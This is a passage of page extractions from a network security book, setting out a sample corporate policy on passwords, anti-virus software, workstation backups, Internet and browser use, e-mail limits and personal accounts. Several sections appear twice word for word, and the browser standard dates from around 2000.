do so in the presence of his or her direct \nsupervisor and a member of human resources. \nƒ When accessing resources outside of the corporate network, the employee is required to \nuse a different password from the one used for internal systems. This is to insure that \ncritical password strings are not transmitted over public networks. Any questions about \nwhich systems are internal to the corporate network should be directed to the employee’s \ndirect supervisor or a member of the network operations staff. \nƒ The company reserves the right to hold the employee liable for damages caused by the \nemployee’s failure to protect the confidentially of his or her password in accordance with \nthe above guidelines. \nA strong password policy insures that all network resources remain secure. \nVirus Prevention Policy \nAll computer resources are to be protected by anti-virus software. It is the responsibility of the \nemployee to insure that the virus software running on his or her system is not disabled or \ncircumvented. If the employee receives any type of warning from the anti-virus software \nrunning on the system, he or she is to immediately cease using the system and contact a \nmember of the network operations staff or his or her direct supervisor. \nIt is the responsibility of the network operations staff to keep all anti-virus software up to date. \nThis will be performed through an automated process while the employee is connected to \nnetwork resources. Employees who suspect that their anti-virus software has not been \nupdated in the last 60 days should contact a member of the network operations staff. \n \nWorkstation Backup Policy \nOn a weekly basis, the network operations staff will perform a backup of documents stored on \neach employee’s workstation. Every employee is assigned a day of the week during which he \nor she must leave his or her system powered up at the end of the day. The employee is to log \noff of the system, but the system must remain powered up. It is the responsibility of the \nemployee to insure that his or her system remains powered up on the correct day. Employees \nshould contact their direct supervisor to find out which day they have been assigned. \nWhen an employee’s workstation is backed up, only documents within the \nC:\\My Documents \ndirectory will be saved. Documents stored in any other directory will be ignored. The employee \nbears responsibility for insuring that he or she saves all documents to this directory. All \ncompany-issued applications are designed to save file information to this directory by default. \nWorkstation Backup Policy \nOn a weekly basis, the network operations staff will perform a backup of documents stored on \neach employee’s workstation. Every employee is assigned a day of the week during which he \nor she must leave his or her system powered up at the end of the day. The employee is to log \noff of the system, but the system must remain powered up. It is the responsibility of the \nemployee to insure that his or her system remains powered up on the correct day. Employees \nshould contact their direct supervisor to find out which day they have been assigned. \nWhen an employee’s workstation is backed up, only documents within the \nC:\\My Documents \ndirectory will be saved. Documents stored in any other directory will be ignored. The employee \nbears responsibility for insuring that he or she saves all documents to this directory. All \ncompany-issued applications are designed to save file information to this directory by default. \n" }, { "page_number": 372, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 372\nGeneral Internet Access Policy \nCompany network resources, including those used to gain access to Internet-based sites, are only to be used for the \nexpress purpose of performing work-related duties. This policy is to insure the effective use of networking \nresources and shall apply equally to all employees. Direct supervisors may approve the use of network resources \nbeyond the scope of this limited access policy when said use meets the following conditions: \nƒ The intended use of network resources is incidental. \nƒ The intended use of network resources does not interfere with the employee’s regular duties. \nƒ The intended use of network resources serves a legitimate company interest. \nƒ The intended use of network resources is for educational purposes and within the scope of the \nemployee’s job function. \nƒ The intended use of network resources does not break any local, state, or federal laws. \nƒ The intended use of network resources will not overburden the network. \nInternet Web Site Access Policy \nWhen accessing an Internet-based Web site, employees are to use a Web browser that meets the corporate \nstandard. This standard requires the use of Internet Explorer 5.5 with the following configuration: \nƒ \nThere are no additional plug-ins. \nƒ \nJava, JavaScript, and ActiveX have been disabled. \nƒ \nCookies have been disabled. \nThese settings are to insure that the employee does not inadvertently load a malicious application while browsing \nInternet Web sites. Failure to comply with these security settings can result in the loss of Internet access \nprivileges. Web browser software should only be installed by network operations personnel. In order to maintain \nproper software licensing, employees are prohibited from retrieving browser software or upgrades from any other \nsource. Any employee who is unsure whether his or her browser meets these company standards should contact \nnetwork operations. \nInternet Mail and Newsgroup Access Policy \nInbound and outbound Internet mail messages are limited to a maximum size of 8MB. Any employee who needs \nto transfer a file that exceeds this requirement should contact the network operations group for access to the \ncorporate FTP server. This limitation is enforced in order to insure that one oversized e-mail message does not \naffect the flow of all corporate messages. \nAll messages transmitted to Internet-based mailing lists or newsgroups should include a company disclaimer as \npart of each message. The required disclaimer is “The opinions expressed in this message do not reflect the views \nof my employer.” The company reserves the right to monitor these transmissions and discard any messages that do \nnot include this disclaimer. \nPersonal Internet-Based Accounts \nCompany network resources may not be used to access personal Internet-based accounts. These include (but are \nnot limited to) \nƒ \nPersonal e-mail accounts \nƒ \nPersonal shell accounts \nƒ \nPersonal accounts with a service provider such as AOL or CompuServe \nPersonal accounts on online services should not be accessed from company systems. This does not include \ncompany-based accounts or subscriptions that may exist on Internet-based systems. Access to corporate accounts \nis considered acceptable, provided that access falls within an employee’s job duties. \n" }, { "page_number": 373, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 373\nGeneral Internet Access Policy \nCompany network resources, including those used to gain access to Internet-based sites, are only to be used for the \nexpress purpose of performing work-related duties. This policy is to insure the effective use of networking \nresources and shall apply equally to all employees. Direct supervisors may approve the use of network resources \nbeyond the scope of this limited access policy when said use meets the following conditions: \nƒ The intended use of network resources is incidental. \nƒ The intended use of network resources does not interfere with the employee’s regular duties. \nƒ The intended use of network resources serves a legitimate company interest. \nƒ The intended use of network resources is for educational purposes and within the scope of the \nemployee’s job function. \nƒ The intended use of network resources does not break any local, state, or federal laws. \nƒ The intended use of network resources will not overburden the network. \nInternet Web Site Access Policy \nWhen accessing an Internet-based Web site, employees are to use a Web browser that meets the corporate \nstandard. This standard requires the use of Internet Explorer 5.5 with the following configuration: \nƒ \nThere are no additional plug-ins. \nƒ \nJava, JavaScript, and ActiveX have been disabled. \nƒ \nCookies have been disabled. \nThese settings are to insure that the employee does not inadvertently load a malicious application while browsing \nInternet Web sites. Failure to comply with these security settings can result in the loss of Internet access \nprivileges. Web browser software should only be installed by network operations personnel. In order to maintain \nproper software licensing, employees are prohibited from retrieving browser software or upgrades from any other \nsource. Any employee who is unsure whether his or her browser meets these company standards should contact \nnetwork operations. \nInternet Mail and Newsgroup Access Policy \nInbound and outbound Internet mail messages are limited to a maximum size of 8MB. Any employee who needs \nto transfer a file that exceeds this requirement should contact the network operations group for access to the \ncorporate FTP server. This limitation is enforced in order to insure that one oversized e-mail message does not \naffect the flow of all corporate messages. \nAll messages transmitted to Internet-based mailing lists or newsgroups should include a company disclaimer as \npart of each message. The required disclaimer is “The opinions expressed in this message do not reflect the views \nof my employer.” The company reserves the right to monitor these transmissions and discard any messages that do \nnot include this disclaimer. \nPersonal Internet-Based Accounts \nCompany network resources may not be used to access personal Internet-based accounts. These include (but are \nnot limited to) \nƒ \nPersonal e-mail accounts \nƒ \nPersonal shell accounts \nƒ \nPersonal accounts with a service provider such as AOL or CompuServe \nPersonal accounts on online services should not be accessed from company systems. This does not include \ncompany-based accounts or subscriptions that may exist on Internet-based systems. Access to corporate accounts \nis considered acceptable, provided that access falls within an employee’s job duties. \n \n" }, { "page_number": 374, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 374\nAdditional Information \nAll queries regarding information within this document, as well as issues that have not been \nspecifically covered, should be directed to the employee’s immediate supervisor. The \nimmediate supervisor is responsible for relaying all queries to network operations or human \nresources, whichever is more appropriate. \n \n" } ] }